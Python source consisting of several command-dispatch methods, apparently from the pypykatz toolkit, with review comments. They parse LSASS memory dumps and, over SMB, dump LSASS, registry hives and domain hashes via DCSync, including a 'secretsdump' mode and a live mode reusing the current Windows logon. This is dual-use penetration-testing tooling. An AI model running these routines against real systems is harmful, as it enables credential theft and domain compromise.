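def run(self, args):
    """Dispatch the offline memory-image commands (``rekall`` / ``minidump``).

    Parses one or more LSASS memory images with pypykatz and hands the
    collected results to ``self.process_results``.

    Args:
        args: parsed CLI namespace. Fields read here: ``cmd``,
            ``memoryfile``, ``packages``, ``kerberos_dir``,
            ``timestamp_override`` (rekall only), ``directory``,
            ``recursive`` and ``halt_on_error`` (minidump only).

    Raises:
        Exception: when ``halt_on_error`` is set and a file fails to parse
            or a parser module reports errors. Otherwise failures are only
            logged and the file is recorded in ``files_with_error``.
    """
    files_with_error = []
    results = {}

    def _ensure_ktickets():
        # A kerberos output directory implies the 'ktickets' module must run
        # ('all' already covers it). Guard against re-appending: the original
        # appended on every iteration, so a directory scan grew the package
        # list by one 'ktickets' entry per file.
        if (args.kerberos_dir is not None
                and 'all' not in args.packages
                and 'ktickets' not in args.packages):
            args.packages.append('ktickets')

    ###### Rekall
    if args.cmd == 'rekall':
        _ensure_ktickets()
        mimi = pypykatz.parse_memory_dump_rekall(
            args.memoryfile, args.timestamp_override, packages=args.packages)
        results['rekall'] = mimi

    ###### Minidump
    elif args.cmd == 'minidump':
        if args.directory:
            dir_fullpath = os.path.abspath(args.memoryfile)
            file_pattern = '*.dmp'
            if args.recursive:
                globdata = os.path.join(dir_fullpath, '**', file_pattern)
            else:
                globdata = os.path.join(dir_fullpath, file_pattern)
            logging.info('Parsing folder %s' % dir_fullpath)
            for filename in glob.glob(globdata, recursive=args.recursive):
                logging.info('Parsing file %s' % filename)
                try:
                    _ensure_ktickets()
                    mimi = pypykatz.parse_minidump_file(filename, packages=args.packages)
                    results[filename] = mimi
                    # Module-level errors are non-fatal unless the user asked
                    # for a halt; the raise below is caught by the handler
                    # beneath so the file still lands in files_with_error.
                    if args.halt_on_error and len(mimi.errors) > 0:
                        raise Exception('Error in modules!')
                except Exception:
                    files_with_error.append(filename)
                    logging.exception('Error parsing file %s ' % filename)
                    if args.halt_on_error:
                        raise
        else:
            logging.info('Parsing file %s' % args.memoryfile)
            try:
                _ensure_ktickets()
                mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
                results[args.memoryfile] = mimi
                if args.halt_on_error and len(mimi.errors) > 0:
                    raise Exception('Error in modules!')
            except Exception:
                logging.exception('Error while parsing file %s' % args.memoryfile)
                if args.halt_on_error:
                    raise
                # Best-effort mode: surface the trace and carry on so
                # process_results still runs for whatever was collected.
                traceback.print_exc()

    self.process_results(results, files_with_error, args)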
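async def run(self, args):
    """Asyncio variant of the ``minidump`` command.

    Parses a single minidump or every ``*.dmp`` under a directory with
    ``apypykatz.parse_minidump_file`` and passes the results to
    ``self.process_results``.

    Args:
        args: parsed CLI namespace. Fields read here: ``cmd``,
            ``memoryfile``, ``packages``, ``directory``, ``recursive``
            and ``halt_on_error``.

    Raises:
        Exception: re-raised from the parser when ``halt_on_error`` is set;
            otherwise the failure is logged and the file is recorded in
            ``files_with_error``.

    Note:
        Unlike the synchronous handler this one does not treat
        ``mimi.errors`` as fatal and does not add 'ktickets' for a kerberos
        output directory — presumably intentional, but worth confirming
        against the sync implementation.
    """
    files_with_error = []
    results = {}

    ###### Minidump
    if args.cmd == 'minidump':
        if args.directory:
            dir_fullpath = os.path.abspath(args.memoryfile)
            file_pattern = '*.dmp'
            if args.recursive:
                globdata = os.path.join(dir_fullpath, '**', file_pattern)
            else:
                globdata = os.path.join(dir_fullpath, file_pattern)
            logging.info('Parsing folder %s' % dir_fullpath)
            for filename in glob.glob(globdata, recursive=args.recursive):
                logging.info('Parsing file %s' % filename)
                try:
                    # The stray debug print('await') that preceded this call
                    # has been removed: it polluted stdout, which is also
                    # where JSON results are emitted.
                    mimi = await apypykatz.parse_minidump_file(filename, packages=args.packages)
                    results[filename] = mimi
                except Exception:
                    files_with_error.append(filename)
                    logging.exception('Error parsing file %s ' % filename)
                    if args.halt_on_error:
                        raise
        else:
            logging.info('Parsing file %s' % args.memoryfile)
            try:
                mimi = await apypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
                results[args.memoryfile] = mimi
            except Exception:
                logging.exception('Error while parsing file %s' % args.memoryfile)
                if args.halt_on_error:
                    raise
                # Best-effort mode: show the trace and still report what
                # was collected.
                traceback.print_exc()

    self.process_results(results, files_with_error, args)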
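async def run(self, args):
    """Dispatch the remote ``smb`` sub-commands.

    Supported ``args.smb_module`` values: ``lsassfile``, ``lsassdump``,
    ``secretsdump`` (LSASS + registry + DCSync, each best-effort),
    ``dcsync``, ``regdump``, ``regfile``, ``shareenum`` and ``client``.

    Args:
        args: parsed CLI namespace. Every branch reads ``verbose``; the
            remaining fields (``url``, ``chunksize``, ``packages``,
            ``outfile``, ``json``, ``username``, ``system``/``sam``/
            ``security``/``software``, the shareenum options, ``commands``)
            belong to individual sub-commands.

    Raises:
        Whatever the underlying aiosmb/pypykatz helper raises; only the
        three stages of ``secretsdump`` are wrapped so one failing stage
        does not abort the others.

    NOTE(review): every file written here (LSASS secrets, registry hives,
    DCSync hashes) holds credential material and is created with the
    process umask; consider a restrictive mode for the output location.
    """
    from aiosmb import logger as smblog

    # 0 silences aiosmb entirely (100 > CRITICAL), 1 gives INFO, higher
    # values map to progressively lower (more verbose) custom levels.
    if args.verbose == 0:
        smblog.setLevel(100)
    elif args.verbose == 1:
        smblog.setLevel(level=logging.INFO)
    else:
        smblog.setLevel(level=5 - args.verbose)

    def _emit_registry(po, outpath):
        # Shared output path for registry results: file (text or JSON) when
        # a path was given, otherwise stdout.
        if po is None:
            return
        if outpath:
            po.to_file(outpath, args.json)
        elif args.json:
            print(json.dumps(po.to_dict(), cls=UniversalEncoder, indent=4, sort_keys=True))
        else:
            print(str(po))

    async def _write_secrets(secret_iter, outpath):
        # Stream DCSync secrets to `outpath` or stdout. The context manager
        # fixes two defects of the original: the handle leaked when dcsync
        # raised mid-stream (plain dcsync branch), and a failing open() left
        # `outfile` unbound so the `finally` clause raised NameError
        # (secretsdump branch).
        if outpath is None:
            async for secret in secret_iter:
                print(str(secret))
            return
        with open(outpath, 'w', newline='') as outfile:
            async for secret in secret_iter:
                outfile.write(str(secret))

    if args.smb_module == 'lsassfile':
        from pypykatz.smb.lsassutils import lsassfile
        mimi = await lsassfile(args.url, chunksize=args.chunksize, packages=args.packages)
        self.process_results({'smbfile': mimi}, [], args)

    elif args.smb_module == 'lsassdump':
        from pypykatz.smb.lsassutils import lsassdump
        mimi = await lsassdump(args.url, chunksize=args.chunksize, packages=args.packages)
        self.process_results({'smbfile': mimi}, [], args)

    elif args.smb_module == 'secretsdump':
        from pypykatz.smb.lsassutils import lsassdump
        from pypykatz.smb.regutils import regdump
        from pypykatz.smb.dcsync import dcsync

        # Each stage is independent; log and continue on failure.
        try:
            mimi = await lsassdump(args.url, chunksize=args.chunksize, packages=args.packages)
            if mimi is not None:
                self.process_results({'smbfile': mimi}, [], args, file_prefix='_lsass.txt')
        except Exception:
            logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')

        try:
            po = await regdump(args.url)
            _emit_registry(po, args.outfile + '_registry.txt' if args.outfile else None)
        except Exception:
            logging.exception('[SECRETSDUMP] Failed to get registry secrets')

        try:
            dcsync_out = None if args.outfile is None else args.outfile + '_dcsync.txt'
            await _write_secrets(dcsync(args.url), dcsync_out)
        except Exception:
            logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')

    elif args.smb_module == 'dcsync':
        from pypykatz.smb.dcsync import dcsync
        await _write_secrets(dcsync(args.url, args.username), args.outfile)

    elif args.smb_module == 'regdump':
        from pypykatz.smb.regutils import regdump
        po = await regdump(args.url)
        _emit_registry(po, args.outfile)

    elif args.smb_module == 'regfile':
        from pypykatz.smb.regutils import regfile
        po = await regfile(args.url, args.system, sam=args.sam,
                           security=args.security, software=args.software)
        _emit_registry(po, args.outfile)

    elif args.smb_module == 'shareenum':
        from pypykatz.smb.shareenum import shareenum
        # tsv wins over json when both flags are set, as in the original.
        output_type = 'str'
        if args.json is True:
            output_type = 'json'
        if args.tsv is True:
            output_type = 'tsv'
        exclude_share = args.es if args.es is not None else []
        exclude_dir = args.ed if args.ed is not None else []
        exclude_target = args.et if args.et is not None else []
        await shareenum(
            args.smb_url,
            targets=args.target,
            smb_worker_count=args.worker_count,
            depth=args.depth,
            out_file=args.out_file,
            progress=args.progress,
            max_items=args.maxitems,
            dirsd=args.dirsd,
            filesd=args.filesd,
            output_type=output_type,
            max_runtime=args.max_runtime,
            exclude_share=exclude_share,
            exclude_dir=exclude_dir,
            ldap_url=args.ldap,
            exclude_target=exclude_target,
        )

    elif args.smb_module == 'client':
        from aiosmb.examples.smbclient import amain
        la = SMBCMDArgs()
        la.smb_url = args.url
        la.verbose = args.verbose
        if args.commands:
            if args.commands[0] == 'help':
                la.commands = ['help']
            else:
                # A 'login' is always issued first unless the user already
                # put one at the head of the command list.
                la.commands = [] if args.commands[0] == 'login' else ['login']
                la.commands.extend(args.commands)
        await amain(la)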
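async def run_live(self, args):
    """Dispatch the ``live smb`` sub-commands using the current Windows logon.

    Builds an ``smb<ver>+sspi-<auth>://DOMAIN\\user@host`` URL from the
    interactive session's logon info (``winacl.get_logon_info``), so the
    remote operations run as the already-authenticated user via SSPI.
    ``shareenum`` builds its own URL (``'auto'``) and skips this step.

    Args:
        args: parsed CLI namespace. Common fields: ``livesmbcommand``,
            ``protocol_version``, ``authmethod``, ``host``, ``verbose``;
            the rest are per-sub-command (``chunksize``, ``packages``,
            ``outfile``, ``json``, ``username``, ``commands``, shareenum
            options).

    Raises:
        Exception: when not running on Windows.
        Anything the underlying aiosmb/pypykatz helper raises; only the
        three ``secretsdump`` stages are wrapped.

    NOTE(review): output files hold credential material and inherit the
    process umask; consider a restrictive mode for the output location.
    """
    if platform.system().lower() != 'windows':
        raise Exception('Live commands only work on Windows!')

    from aiosmb import logger as smblog
    from winacl.functions.highlevel import get_logon_info

    info = get_logon_info()
    if args.livesmbcommand != 'shareenum':
        smb_url = 'smb%s+sspi-%s://%s\\%s@%s' % (
            args.protocol_version, args.authmethod, info['domain'], info['username'], args.host)

    # 0 silences aiosmb (100 > CRITICAL), 1 gives INFO, higher values map
    # to progressively lower custom levels.
    if args.verbose == 0:
        smblog.setLevel(100)
    elif args.verbose == 1:
        smblog.setLevel(level=logging.INFO)
    else:
        smblog.setLevel(level=5 - args.verbose)

    def _emit_registry(po, outpath):
        # Registry results go to a file (text/JSON) when a path is given,
        # else to stdout.
        if po is None:
            return
        if outpath:
            po.to_file(outpath, args.json)
        elif args.json:
            print(json.dumps(po.to_dict(), cls=UniversalEncoder, indent=4, sort_keys=True))
        else:
            print(str(po))

    async def _write_secrets(secret_iter, outpath):
        # Stream DCSync secrets to `outpath` or stdout. The context manager
        # closes the handle even if dcsync raises mid-stream (the plain
        # dcsync branch leaked it) and avoids the unbound `outfile` in the
        # original secretsdump `finally` when open() itself failed.
        if outpath is None:
            async for secret in secret_iter:
                print(str(secret))
            return
        with open(outpath, 'w', newline='') as outfile:
            async for secret in secret_iter:
                outfile.write(str(secret))

    if args.livesmbcommand == 'client':
        from aiosmb.examples.smbclient import amain
        la = SMBCMDArgs()
        la.smb_url = smb_url
        la.verbose = args.verbose
        if args.commands:
            if args.commands[0] == 'help':
                la.commands = ['help']
            else:
                # Always log in first unless the user already started
                # the command list with 'login'.
                la.commands = [] if args.commands[0] == 'login' else ['login']
                la.commands.extend(args.commands)
        await amain(la)

    elif args.livesmbcommand == 'lsassdump':
        from pypykatz.smb.lsassutils import lsassdump
        mimi = await lsassdump(smb_url, chunksize=args.chunksize, packages=args.packages)
        self.process_results({'smbfile': mimi}, [], args)

    elif args.livesmbcommand == 'secretsdump':
        from pypykatz.smb.lsassutils import lsassdump
        from pypykatz.smb.regutils import regdump
        from pypykatz.smb.dcsync import dcsync

        # Each stage is independent; log and continue on failure.
        try:
            mimi = await lsassdump(smb_url, chunksize=args.chunksize, packages=args.packages)
            if mimi is not None:
                self.process_results({'smbfile': mimi}, [], args, file_prefix='_lsass.txt')
        except Exception:
            logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')

        try:
            po = await regdump(smb_url)
            _emit_registry(po, args.outfile + '_registry.txt' if args.outfile else None)
        except Exception:
            logging.exception('[SECRETSDUMP] Failed to get registry secrets')

        try:
            dcsync_out = None if args.outfile is None else args.outfile + '_dcsync.txt'
            await _write_secrets(dcsync(smb_url), dcsync_out)
        except Exception:
            logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')

    elif args.livesmbcommand == 'dcsync':
        from pypykatz.smb.dcsync import dcsync
        await _write_secrets(dcsync(smb_url, args.username), args.outfile)

    elif args.livesmbcommand == 'regdump':
        from pypykatz.smb.regutils import regdump
        po = await regdump(smb_url)
        _emit_registry(po, args.outfile)

    elif args.livesmbcommand == 'shareenum':
        from pypykatz.smb.shareenum import shareenum
        # tsv wins over json when both flags are set, as in the original.
        output_type = 'str'
        if args.json is True:
            output_type = 'json'
        if args.tsv is True:
            output_type = 'tsv'
        exclude_share = args.es if args.es is not None else []
        exclude_dir = args.ed if args.ed is not None else []
        exclude_target = args.et if args.et is not None else []
        # LDAP is auto-discovered unless explicitly skipped.
        ldap_url = None if args.skip_ldap is True else 'auto'
        await shareenum(
            smb_url='auto',
            targets=args.target,
            smb_worker_count=args.worker_count,
            depth=args.depth,
            out_file=args.out_file,
            progress=args.progress,
            max_items=args.maxitems,
            dirsd=args.dirsd,
            filesd=args.filesd,
            authmethod=args.authmethod,
            protocol_version=args.protocol_version,
            output_type=output_type,
            max_runtime=args.max_runtime,
            exclude_share=exclude_share,
            exclude_dir=exclude_dir,
            ldap_url=ldap_url,
            exclude_target=exclude_target,
        )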
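async def run(self, args):
    """Dispatch the remote ``smb`` sub-commands (variant without chunksize/packages).

    Supported ``args.smb_module`` values: ``lsassfile``, ``lsassdump``,
    ``secretsdump`` (LSASS + registry + DCSync, each best-effort),
    ``dcsync``, ``regdump``, ``regfile`` and ``console``.

    Args:
        args: parsed CLI namespace. Every branch reads ``verbose``; the
            remaining fields (``url``, ``outfile``, ``json``, ``username``,
            ``system``/``sam``/``security``/``software``, ``commands``)
            belong to individual sub-commands.

    Raises:
        Whatever the underlying aiosmb/pypykatz helper raises; only the
        three ``secretsdump`` stages are wrapped so one failing stage does
        not abort the others.

    NOTE(review): output files hold credential material and inherit the
    process umask; consider a restrictive mode for the output location.
    """
    from aiosmb import logger as smblog

    # 0 silences aiosmb (100 > CRITICAL), 1 gives INFO, higher values map
    # to progressively lower custom levels.
    if args.verbose == 0:
        smblog.setLevel(100)
    elif args.verbose == 1:
        smblog.setLevel(level=logging.INFO)
    else:
        smblog.setLevel(level=5 - args.verbose)

    def _emit_registry(po, outpath):
        # Registry results go to a file (text/JSON) when a path is given,
        # else to stdout.
        if po is None:
            return
        if outpath:
            po.to_file(outpath, args.json)
        elif args.json:
            print(json.dumps(po.to_dict(), cls=UniversalEncoder, indent=4, sort_keys=True))
        else:
            print(str(po))

    async def _write_secrets(secret_iter, outpath):
        # Stream DCSync secrets to `outpath` or stdout. The context manager
        # closes the handle even if dcsync raises mid-stream (the plain
        # dcsync branch leaked it) and avoids the unbound `outfile` in the
        # original secretsdump `finally` when open() itself failed.
        if outpath is None:
            async for secret in secret_iter:
                print(str(secret))
            return
        with open(outpath, 'w', newline='') as outfile:
            async for secret in secret_iter:
                outfile.write(str(secret))

    if args.smb_module == 'lsassfile':
        from pypykatz.smb.lsassutils import lsassfile
        mimi = await lsassfile(args.url)
        self.process_results({'smbfile': mimi}, [], args)

    elif args.smb_module == 'lsassdump':
        from pypykatz.smb.lsassutils import lsassdump
        mimi = await lsassdump(args.url)
        self.process_results({'smbfile': mimi}, [], args)

    elif args.smb_module == 'secretsdump':
        from pypykatz.smb.lsassutils import lsassdump
        from pypykatz.smb.regutils import regdump
        from pypykatz.smb.dcsync import dcsync

        # Each stage is independent; log and continue on failure.
        try:
            mimi = await lsassdump(args.url)
            if mimi is not None:
                self.process_results({'smbfile': mimi}, [], args, file_prefix='_lsass.txt')
        except Exception:
            logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')

        try:
            po = await regdump(args.url)
            _emit_registry(po, args.outfile + '_registry.txt' if args.outfile else None)
        except Exception:
            logging.exception('[SECRETSDUMP] Failed to get registry secrets')

        try:
            dcsync_out = None if args.outfile is None else args.outfile + '_dcsync.txt'
            await _write_secrets(dcsync(args.url), dcsync_out)
        except Exception:
            logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')

    elif args.smb_module == 'dcsync':
        from pypykatz.smb.dcsync import dcsync
        await _write_secrets(dcsync(args.url, args.username), args.outfile)

    elif args.smb_module == 'regdump':
        from pypykatz.smb.regutils import regdump
        po = await regdump(args.url)
        _emit_registry(po, args.outfile)

    elif args.smb_module == 'regfile':
        from pypykatz.smb.regutils import regfile
        po = await regfile(args.url, args.system, sam=args.sam,
                           security=args.security, software=args.software)
        _emit_registry(po, args.outfile)

    elif args.smb_module == 'console':
        from aiosmb.examples.smbclient import amain
        la = SMBCMDArgs()
        la.smb_url = args.url
        la.verbose = args.verbose
        if args.commands:
            if args.commands[0] == 'help':
                la.commands = ['help']
            else:
                # Always log in first unless the user already started
                # the command list with 'login'.
                la.commands = [] if args.commands[0] == 'login' else ['login']
                la.commands.extend(args.commands)
        await amain(la)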